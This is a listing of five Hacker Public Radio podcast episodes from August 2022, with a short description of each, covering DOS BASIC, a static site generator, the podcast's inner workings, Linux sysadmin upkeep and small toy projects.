hpr3660 :: BASIC hosted by Ahuka

2022-08-12. 00:08:05. Clean. DOS.
.
We continue our technological archeology to explore the old warhorse, DOS. This time it is BASIC.

hpr3659 :: Developing an HPR static site generator hosted by Rho`n

2022-08-11. 00:11:13. Clean. general.
.
Rho`n describes his approach to developing a static site generator for HPR

hpr3658 :: Linux Inlaws S01E62: HPR's inner workings hosted by monochromec

2022-08-10. 00:32:55. Clean. Linux Inlaws.
.
An overview of HPRs inner workings and stats based on a ludicrous claim by the Inlaws

hpr3657 :: Small time sysadmin hosted by Some Guy On The Internet

2022-08-09. 00:26:08. Clean. general.
.
How I maintain my Linux Box, Part One.

hpr3656 :: Importance of Small toy projects hosted by norrist

2022-08-08. 00:19:09. Clean. general.
.
Toy projects are a great way to learn a new language, and a project I did just for fun.

Older Shows

Get a full list of all our shows.